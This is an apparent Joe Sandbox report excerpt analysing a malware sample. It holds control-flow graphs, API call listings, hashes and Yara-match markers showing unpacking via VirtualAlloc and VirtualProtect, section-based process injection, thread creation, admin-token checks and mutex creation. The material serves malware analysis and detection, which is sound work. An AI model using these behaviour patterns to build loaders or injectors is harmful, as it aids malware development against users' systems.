                                                                                control_flow_graph 231 403149-40314e 232 403150-403151 231->232 233 403152-403156 231->233 232->233 234 403157-403172 233->234 235 4030fe-403127 RtlCreateUserThread NtTerminateProcess 233->235 239 403174 234->239 236 40312a-40312f 235->236 240 403176 239->240 241 40317d-403182 239->241 240->241 242 403178 240->242 243 403184 241->243 244 40318a-403192 call 40120f 241->244 242->241 243->244 245 403186-403189 243->245 244->239 248 403196-4031ac 244->248 245->244 251 4031b0 248->251 251->251
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2007689092.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_sbttifb.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0998c5da932cb652e732e08efa62070a5860df8833ed3ae03222be4492deafee
                                                                                • Instruction ID: 15e76b100028984b8ee99d2dec5c44828c89a921298bb6101f651bfb9f41234e
                                                                                • Opcode Fuzzy Hash: 0998c5da932cb652e732e08efa62070a5860df8833ed3ae03222be4492deafee
                                                                                • Instruction Fuzzy Hash: 6F0128315186048BE7285E799886226BFA5EF18337F28037FD122E87D1E13E8707964F
                                                                                Function 0250003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 0 250003c-2500047 1 2500049 0->1 2 250004c-2500263 call 2500a3f call 2500e0f call 2500d90 VirtualAlloc 0->2 1->2 17 2500265-2500289 call 2500a69 2->17 18 250028b-2500292 2->18 22 25002ce-25003c2 VirtualProtect call 2500cce call 2500ce7 17->22 20 25002a1-25002b0 18->20 21 25002b2-25002cc 20->21 20->22 21->20 29 25003d1-25003e0 22->29 30 25003e2-2500437 call 2500ce7 29->30 31 2500439-25004b8 VirtualFree 29->31 30->29 33 25005f4-25005fe 31->33 34 25004be-25004cd 31->34 35 2500604-250060d 33->35 36 250077f-2500789 33->36 38 25004d3-25004dd 34->38 35->36 39 2500613-2500637 35->39 42 25007a6-25007b0 36->42 43 250078b-25007a3 36->43 38->33 41 25004e3-2500505 38->41 46 250063e-2500648 39->46 50 2500517-2500520 41->50 51 2500507-2500515 41->51 44 25007b6-25007cb 42->44 45 250086e-25008be LoadLibraryA 42->45 43->42 48 25007d2-25007d5 44->48 55 25008c7-25008f9 45->55 46->36 49 250064e-250065a 46->49 52 2500824-2500833 48->52 53 25007d7-25007e0 48->53 49->36 54 2500660-250066a 49->54 58 2500526-2500547 50->58 51->58 62 2500839-250083c 52->62 59 25007e2 53->59 60 25007e4-2500822 53->60 61 250067a-2500689 54->61 56 2500902-250091d 55->56 57 25008fb-2500901 55->57 57->56 63 250054d-2500550 58->63 59->52 60->48 64 2500750-250077a 61->64 65 250068f-25006b2 61->65 62->45 66 250083e-2500847 62->66 68 25005e0-25005ef 63->68 69 2500556-250056b 63->69 64->46 70 25006b4-25006ed 65->70 71 25006ef-25006fc 65->71 72 2500849 66->72 73 250084b-250086c 66->73 68->38 74 250056d 69->74 75 250056f-250057a 69->75 70->71 76 250074b 71->76 77 25006fe-2500748 71->77 72->45 73->62 74->68 78 250059b-25005bb 75->78 79 250057c-2500599 75->79 76->61 77->76 84 25005bd-25005db 78->84 79->84 84->63
                                                                                APIs
                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0250024D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2008604231.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_2500000_sbttifb.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID: cess$kernel32.dll
                                                                                • API String ID: 4275171209-1230238691
                                                                                • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                • Instruction ID: d22ed95cb5831a94056153933ccb0e91e3a883fca86dc31300ba2bdcee715594
                                                                                • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                • Instruction Fuzzy Hash: 5F525974A01229DFDB64CF58C984BACBBB1BF09314F1480D9E94DAB391DB30AA95CF14
                                                                                Function 026F52A2 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 252 26f52a2-26f52bb 253 26f52bd-26f52bf 252->253 254 26f52c6-26f52d2 CreateToolhelp32Snapshot 253->254 255 26f52c1 253->255 256 26f52d4-26f52da 254->256 257 26f52e2-26f52ef Module32First 254->257 255->254 256->257 264 26f52dc-26f52e0 256->264 258 26f52f8-26f5300 257->258 259 26f52f1-26f52f2 call 26f4f61 257->259 262 26f52f7 259->262 262->258 264->253 264->257
                                                                                APIs
                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 026F52CA
                                                                                • Module32First.KERNEL32(00000000,00000224), ref: 026F52EA
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2008845370.00000000026EE000.00000040.00000020.00020000.00000000.sdmp, Offset: 026EE000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_26ee000_sbttifb.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                • String ID:
                                                                                • API String ID: 3833638111-0
                                                                                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                • Instruction ID: 086e6c9bef6b45daf559aebc765d962f13f5a9458e25c3704a70767bdbed916b
                                                                                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                • Instruction Fuzzy Hash: ADF090326007116FDB603BF9A8CCBAEB6ECAF49625F500629E747915C0DB70EC458A65
                                                                                Function 02500E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 265 2500e0f-2500e24 SetErrorMode * 2 266 2500e26 265->266 267 2500e2b-2500e2c 265->267 266->267
                                                                                APIs
                                                                                • SetErrorMode.KERNELBASE(00000400,?,?,02500223,?,?), ref: 02500E19
                                                                                • SetErrorMode.KERNELBASE(00000000,?,?,02500223,?,?), ref: 02500E1E
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2008604231.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_2500000_sbttifb.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorMode
                                                                                • String ID:
                                                                                • API String ID: 2340568224-0
                                                                                • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                • Instruction ID: cd0e9797bfc09d9f78c0388e83fc3af33c066d267375c4749b7347c23f21e4af
                                                                                • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                • Instruction Fuzzy Hash: 5ED0123114512877D7002A94DC09BCD7F1CDF05B66F008011FB0DE90C0C770954046E9
                                                                                Function 0040192A Relevance: 1.3, APIs: 1, Instructions: 64sleepCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 268 40192a-40195e call 401196 Sleep call 40141a 277 401960-401968 call 401513 268->277 278 40196d-4019b8 call 401196 268->278 277->278
                                                                                APIs
                                                                                • Sleep.KERNELBASE(00001388), ref: 00401949
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2007689092.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_sbttifb.jbxd
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID:
                                                                                • API String ID: 3472027048-0
                                                                                • Opcode ID: e590d6087ef849e6d5dc42af1f36e43da1ae6ac463b40af5ec02edc632c7ec29
                                                                                • Instruction ID: c9f3fcf8bcf4793f4e93774b1f3aea48b9d62e180a47635587c881d01dd95fe5
                                                                                • Opcode Fuzzy Hash: e590d6087ef849e6d5dc42af1f36e43da1ae6ac463b40af5ec02edc632c7ec29
                                                                                • Instruction Fuzzy Hash: 44118BB520C204EBEB006A949C61EBA33689B41324F308033FA537A1F1C53D9A13F66F
                                                                                Function 004018FA Relevance: 1.3, APIs: 1, Instructions: 61sleepCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 292 4018fa-40195e call 401196 Sleep call 40141a 306 401960-401968 call 401513 292->306 307 40196d-4019b8 call 401196 292->307 306->307
                                                                                APIs
                                                                                • Sleep.KERNELBASE(00001388), ref: 00401949
                                                                                  • Part of subcall function 00401513: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
                                                                                  • Part of subcall function 00401513: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2007689092.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_sbttifb.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                • String ID:
                                                                                • API String ID: 4152845823-0
                                                                                • Opcode ID: 4f455529237ed37661ab323116e9dd70b25b96b1891abafaa669d2a166d89a0c
                                                                                • Instruction ID: b7e75c0626d3bb27724d4ec46791fa532c83bfb7d8b633e26b51f8edd18e17c4
                                                                                • Opcode Fuzzy Hash: 4f455529237ed37661ab323116e9dd70b25b96b1891abafaa669d2a166d89a0c
                                                                                • Instruction Fuzzy Hash: 8D0169F520C204EBEB006A959C61E7A32A89B40314F308433BA53791F1D57D9A13F66F
                                                                                Function 00401906 Relevance: 1.3, APIs: 1, Instructions: 56sleepCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 321 401906-40195e call 401196 Sleep call 40141a 333 401960-401968 call 401513 321->333 334 40196d-4019b8 call 401196 321->334 333->334
                                                                                APIs
                                                                                • Sleep.KERNELBASE(00001388), ref: 00401949
                                                                                  • Part of subcall function 00401513: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
                                                                                  • Part of subcall function 00401513: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2007689092.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_sbttifb.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                • String ID:
                                                                                • API String ID: 4152845823-0
                                                                                • Opcode ID: f2aa24b159777525133b0c37544b8da22a58b02743232fac7b49631ece76fc28
                                                                                • Instruction ID: d22cbc81ffad1bf36218d88fcd010809f3a6372a226c5372991517933d0026e7
                                                                                • Opcode Fuzzy Hash: f2aa24b159777525133b0c37544b8da22a58b02743232fac7b49631ece76fc28
                                                                                • Instruction Fuzzy Hash: B0018CB5608100EBEB005AA18861BBA33A89B55310F308537FA53791F5C53D9A13EB2F
                                                                                Function 00401937 Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 348 401937-40193b 349 401925-401939 348->349 350 40193c-40195e call 401196 Sleep call 40141a 348->350 349->350 359 401960-401968 call 401513 350->359 360 40196d-4019b8 call 401196 350->360 359->360
                                                                                APIs
                                                                                • Sleep.KERNELBASE(00001388), ref: 00401949
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2007689092.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_sbttifb.jbxd
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID:
                                                                                • API String ID: 3472027048-0
                                                                                • Opcode ID: 23a7989e7a2524b76de4928b01830f2bcda93d6fb81d10b9735e2ff1c3c734ba
                                                                                • Instruction ID: 58f7e284f65f0deed68c1957b19a6c9fa897bc81c1ad5f596fd0fc14cb75afb8
                                                                                • Opcode Fuzzy Hash: 23a7989e7a2524b76de4928b01830f2bcda93d6fb81d10b9735e2ff1c3c734ba
                                                                                • Instruction Fuzzy Hash: 15018FB6608204E7EB005A94D861EBA32289B41321F208137FA23791F5C53D8A13E76B
                                                                                Function 00401926 Relevance: 1.3, APIs: 1, Instructions: 49sleepCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 374 401926-40195e call 401196 Sleep call 40141a 385 401960-401968 call 401513 374->385 386 40196d-4019b8 call 401196 374->386 385->386
                                                                                APIs
                                                                                • Sleep.KERNELBASE(00001388), ref: 00401949
                                                                                  • Part of subcall function 00401513: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
                                                                                  • Part of subcall function 00401513: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2007689092.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_sbttifb.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                • String ID:
                                                                                • API String ID: 4152845823-0
                                                                                • Opcode ID: adca0762ce3db872b76960727b6724d0b95666fb2f7ba4eb884b2811624206fc
                                                                                • Instruction ID: 96766bc7df1ac7ff96305ad3f9c1d052b76615a330d402c70b0abf72a80acf22
                                                                                • Opcode Fuzzy Hash: adca0762ce3db872b76960727b6724d0b95666fb2f7ba4eb884b2811624206fc
                                                                                • Instruction Fuzzy Hash: 40014BB5208105E7EB006E959861EBA33689B45314F308533BA53791F1C53D8A13FB2F
                                                                                Function 026F4F61 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 400 26f4f61-26f4f9b call 26f5274 403 26f4f9d-26f4fd0 VirtualAlloc call 26f4fee 400->403 404 26f4fe9 400->404 406 26f4fd5-26f4fe7 403->406 404->404 406->404
                                                                                APIs
                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 026F4FB2
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2008845370.00000000026EE000.00000040.00000020.00020000.00000000.sdmp, Offset: 026EE000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_26ee000_sbttifb.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                • Instruction ID: d535041f3431c4d62caf82fb9e6ae97377766edb5f3fe5f96278421c1e6f4fe9
                                                                                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                • Instruction Fuzzy Hash: 79113C79A00208EFDB01DF98C985E99BBF5AF08351F058094FA489B361D771EA50DF90
                                                                                Function 0040191E Relevance: 1.3, APIs: 1, Instructions: 47sleepCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 407 40191e-40195e call 401196 Sleep call 40141a 416 401960-401968 call 401513 407->416 417 40196d-4019b8 call 401196 407->417 416->417
                                                                                APIs
                                                                                • Sleep.KERNELBASE(00001388), ref: 00401949
                                                                                  • Part of subcall function 00401513: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
                                                                                  • Part of subcall function 00401513: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2007689092.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_sbttifb.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                • String ID:
                                                                                • API String ID: 4152845823-0
                                                                                • Opcode ID: 5209ebee30330765688d0b4a9a44bb5409681334373931677855da3aedfd269d
                                                                                • Instruction ID: c6131c3a50a378ccb7249bf603a143f64ac18458d27712ce8a7102c0a8bf1339
                                                                                • Opcode Fuzzy Hash: 5209ebee30330765688d0b4a9a44bb5409681334373931677855da3aedfd269d
                                                                                • Instruction Fuzzy Hash: 03011DB5208105E7EB006E95D861E7E33699B44315F308537BA53791F5C63D8A13E72F

                                                                                Execution Graph

                                                                                Execution Coverage:1.5%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:23.4%
                                                                                Total number of Nodes:124
                                                                                Total number of Limit Nodes:22
                                                                                execution_graph 31315 7ff6cc3588f7 31317 7ff6cc3592d0 31315->31317 31319 7ff6cc358380 31315->31319 31316 7ff6cc35a52d 31317->31316 31318 7ff6cc35930c LoadLibraryW 31317->31318 31317->31319 31318->31319 31321 7ff6cc3b5750 RtlAllocateHeap 31319->31321 31322 7ff6cc3b5870 31319->31322 31321->31319 31323 7ff6cc3b5890 31322->31323 31324 7ff6cc3b5bed RtlRestoreThreadPreferredUILanguages 31323->31324 31325 7ff6cc3b5c2f 31323->31325 31324->31323 31325->31319 31345 7ff6cc376900 31346 7ff6cc376923 31345->31346 31347 7ff6cc3b5620 RtlDeleteBoundaryDescriptor 31346->31347 31348 7ff6cc376dc5 31346->31348 31347->31346 31349 7ff6cc3af310 31350 7ff6cc3af340 31349->31350 31351 7ff6cc3af430 CheckTokenMembership 31350->31351 31352 7ff6cc3af388 AllocateAndInitializeSid 31350->31352 31353 7ff6cc3af4a1 31350->31353 31351->31350 31352->31350 31364 7ff6cc355d0b 31365 7ff6cc355f49 31364->31365 31368 7ff6cc355c80 31364->31368 31365->31368 31370 7ff6cc3aff60 31365->31370 31366 7ff6cc3578f6 31368->31366 31374 7ff6cc35d030 RtlAllocateHeap 31368->31374 31373 7ff6cc3affa7 31370->31373 31371 7ff6cc3b02fe FindWindowW 31371->31373 31372 7ff6cc3b04bf 31372->31368 31373->31371 31373->31372 31374->31368 31434 7ff6cc355870 RtlDeleteBoundaryDescriptor RtlRestoreThreadPreferredUILanguages 31418 7ff6cc34e810 31425 7ff6cc34e89c 31418->31425 31419 7ff6cc3533eb LoadLibraryA 31419->31425 31420 7ff6cc353648 LoadLibraryA 31420->31425 31421 7ff6cc3525e1 LoadLibraryA 31421->31425 31422 7ff6cc352c14 LoadLibraryA 31422->31425 31424 7ff6cc353a9f 31425->31419 31425->31420 31425->31421 31425->31422 31425->31424 31426 7ff6cc3afa00 RtlAllocateHeap RtlDeleteBoundaryDescriptor RtlRestoreThreadPreferredUILanguages 31425->31426 31426->31425 31326 7ff6cc3364a0 31337 7ff6cc3ac230 RtlAllocateHeap RtlDeleteBoundaryDescriptor RtlRestoreThreadPreferredUILanguages 31326->31337 31328 7ff6cc336519 31330 7ff6cc339a2a 31328->31330 31332 7ff6cc3b5870 RtlRestoreThreadPreferredUILanguages 31328->31332 31333 7ff6cc337a9b 31328->31333 31334 7ff6cc33a0f0 RtlAllocateHeap RtlRestoreThreadPreferredUILanguages 31328->31334 31338 7ff6cc339ac0 RtlAllocateHeap RtlDeleteBoundaryDescriptor 31328->31338 31339 7ff6cc392ba0 31328->31339 31344 7ff6cc340050 RtlAllocateHeap RtlDeleteBoundaryDescriptor RtlRestoreThreadPreferredUILanguages 31328->31344 31332->31328 31333->31328 31343 7ff6cc392d70 ReadFile 31333->31343 31334->31328 31337->31328 31338->31328 31340 7ff6cc392c10 31339->31340 31341 7ff6cc392bc2 CreateFileW 31340->31341 31342 7ff6cc392d54 31340->31342 31341->31340 31342->31328 31343->31333 31344->31328 31479 7ff6cc335120 RtlRestoreThreadPreferredUILanguages 31441 7ff6cc35b6a0 11 API calls 31442 7ff6cc3af5b0 OpenProcessToken 31484 7ff6cc358380 Sleep RtlAllocateHeap RtlDeleteBoundaryDescriptor RtlRestoreThreadPreferredUILanguages 31443 7ff6cc3b8ab0 6 API calls 31485 7ff6cc355c50 RtlAllocateHeap RtlRestoreThreadPreferredUILanguages 31375 7ff6cc393030 31376 7ff6cc39306d 31375->31376 31377 7ff6cc3b5870 RtlRestoreThreadPreferredUILanguages 31376->31377 31378 7ff6cc3932a7 FindCloseChangeNotification 31376->31378 31379 7ff6cc3934f5 31376->31379 31381 7ff6cc394370 RtlRestoreThreadPreferredUILanguages 31376->31381 31377->31376 31378->31376 31381->31376 31382 7ff6cc38e430 31389 7ff6cc3b5750 31382->31389 31384 7ff6cc38e475 31386 7ff6cc38f30c 31384->31386 31393 7ff6cc3b5c40 31384->31393 31387 7ff6cc3b5870 RtlRestoreThreadPreferredUILanguages 31386->31387 31388 7ff6cc38f31b 31387->31388 31390 7ff6cc3b57ac 31389->31390 31391 7ff6cc3b5790 RtlAllocateHeap 31390->31391 31392 7ff6cc3b57bc 31390->31392 31391->31390 31392->31384 31394 7ff6cc3b5c8f 31393->31394 31395 7ff6cc3b5c70 RtlAllocateHeap 31394->31395 31396 7ff6cc3b5c9f 31394->31396 31395->31394 31396->31384 31449 7ff6cc331240 RtlDeleteBoundaryDescriptor 31490 7ff6cc335ac0 16 API calls 31354 7ff6cc3b07d0 31355 7ff6cc3b0819 31354->31355 31356 7ff6cc3b1097 IsDlgButtonChecked 31355->31356 31357 7ff6cc3b0bc2 IsDlgButtonChecked 31355->31357 31358 7ff6cc3b102b IsDlgButtonChecked 31355->31358 31359 7ff6cc3b13b0 31355->31359 31356->31355 31357->31355 31358->31355 31360 7ff6cc3b13d0 31361 7ff6cc3b141d 31360->31361 31362 7ff6cc3b13f0 IsDlgButtonChecked 31361->31362 31363 7ff6cc3b142d 31361->31363 31362->31361 31493 7ff6cc3ac1d0 RtlAllocateHeap RtlDeleteBoundaryDescriptor 31397 7ff6cc346a50 31404 7ff6cc33eb50 31397->31404 31399 7ff6cc346a8e 31400 7ff6cc3b5870 RtlRestoreThreadPreferredUILanguages 31399->31400 31401 7ff6cc346b13 FindCloseChangeNotification 31399->31401 31402 7ff6cc346f9c CreateMutexExA 31399->31402 31403 7ff6cc346fc7 31399->31403 31400->31399 31401->31399 31402->31399 31405 7ff6cc33eba2 31404->31405 31406 7ff6cc33c400 RtlAllocateHeap RtlDeleteBoundaryDescriptor RtlRestoreThreadPreferredUILanguages 31405->31406 31407 7ff6cc33f1b0 31405->31407 31408 7ff6cc3b5750 RtlAllocateHeap 31405->31408 31406->31405 31407->31399 31408->31405 31453 7ff6cc355c50 RtlAllocateHeap 31496 7ff6cc35b1d0 IsDlgButtonChecked IsDlgButtonChecked IsDlgButtonChecked 31497 7ff6cc358380 RtlAllocateHeap RtlDeleteBoundaryDescriptor RtlRestoreThreadPreferredUILanguages 31299 7ff6cc3558dc 31300 7ff6cc3558e8 31299->31300 31304 7ff6cc355870 31300->31304 31306 7ff6cc35f570 RtlAllocateHeap RtlRestoreThreadPreferredUILanguages 31300->31306 31302 7ff6cc355a7d 31307 7ff6cc37b3e0 31302->31307 31306->31302 31308 7ff6cc37b40f 31307->31308 31310 7ff6cc355a9c 31308->31310 31311 7ff6cc3b5680 31308->31311 31312 7ff6cc3b56a6 31311->31312 31313 7ff6cc3b5707 RtlAllocateHeap 31312->31313 31314 7ff6cc3b5736 31312->31314 31313->31312 31314->31308 31461 7ff6cc3a3e70 LoadLibraryW RtlAllocateHeap RtlDeleteBoundaryDescriptor RtlRestoreThreadPreferredUILanguages 31409 7ff6cc344970 31410 7ff6cc344a1c 31409->31410 31411 7ff6cc344a0b SleepEx 31410->31411 31413 7ff6cc344bc4 31410->31413 31414 7ff6cc392f40 31410->31414 31411->31410 31415 7ff6cc392f74 31414->31415 31416 7ff6cc392f60 GetFileAttributesA 31415->31416 31417 7ff6cc392f84 31415->31417 31416->31415 31417->31410

                                                                                Executed Functions

                                                                                Function 00007FF6CC34E810 Relevance: 109.0, APIs: 4, Strings: 56, Instructions: 3967COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: !@X$!@X$#{j$#{j$29K&$29K&$29K&$5no$5no$GSw'$GSw'$LK@f$LK@f$SQ>$SQ>$SQ>$SQ>$U8PB$U8PB$U8PB$U8PB$U8PB$b~D+$c$&o$c$&o$cpHi$cpHi$c~D+$c~D+$d6M $dfb$dfb$dl!$dl!$e6M $e6M $e6M $g1E$hTw*$hTw*$mF$nF$nF$u|$u|$v'Hu$v'Hu$xl$yl$yl$yl${3\M${F"7$|3\M$|3\M$pcR
                                                                                • API String ID: 0-1998008778
                                                                                • Opcode ID: 9a2ff04d6d200e89dbdb88af5bdf8fed4f97cd62d83c3a83ade47878a07dfed0
                                                                                • Instruction ID: ce3c249329585addcbbfec86d809b368ab25e962d99b122b705be10af85c0230
                                                                                • Opcode Fuzzy Hash: 9a2ff04d6d200e89dbdb88af5bdf8fed4f97cd62d83c3a83ade47878a07dfed0
                                                                                • Instruction Fuzzy Hash: 1A83D961E086C68DFB78CF35A8A47FD7690EF4470AF10843AD69ECBBD4CE2956808745
                                                                                Function 00007FF6CC3AF310 Relevance: 3.1, APIs: 2, Instructions: 87memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1702 7ff6cc3af310-7ff6cc3af33e 1703 7ff6cc3af360-7ff6cc3af366 1702->1703 1704 7ff6cc3af420-7ff6cc3af426 1703->1704 1705 7ff6cc3af36c-7ff6cc3af372 1703->1705 1708 7ff6cc3af428-7ff6cc3af42e 1704->1708 1709 7ff6cc3af47c-7ff6cc3af490 1704->1709 1706 7ff6cc3af340-7ff6cc3af35f 1705->1706 1707 7ff6cc3af374-7ff6cc3af37a 1705->1707 1706->1703 1710 7ff6cc3af380-7ff6cc3af386 1707->1710 1711 7ff6cc3af46a-7ff6cc3af477 1707->1711 1712 7ff6cc3af430-7ff6cc3af465 CheckTokenMembership 1708->1712 1713 7ff6cc3af495-7ff6cc3af49b 1708->1713 1709->1703 1710->1703 1715 7ff6cc3af388-7ff6cc3af40c AllocateAndInitializeSid 1710->1715 1711->1703 1712->1703 1713->1703 1716 7ff6cc3af4a1-7ff6cc3af4b5 1713->1716 1715->1703
                                                                                APIs
                                                                                • AllocateAndInitializeSid.KERNELBASE ref: 00007FF6CC3AF3E6
                                                                                • CheckTokenMembership.KERNELBASE(?,?,?,?,?,?,?,?,F4EB9223,?,0645EEAE8F7DAD8E,1063196CE2D18368,?,?,00007FF6CC34B07B), ref: 00007FF6CC3AF442
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateCheckInitializeMembershipToken
                                                                                • String ID:
                                                                                • API String ID: 1663163955-0
                                                                                • Opcode ID: 8819bed3663e1e96ee0d00ee15cf93aa921c6ea50412d524142ccb894634a248
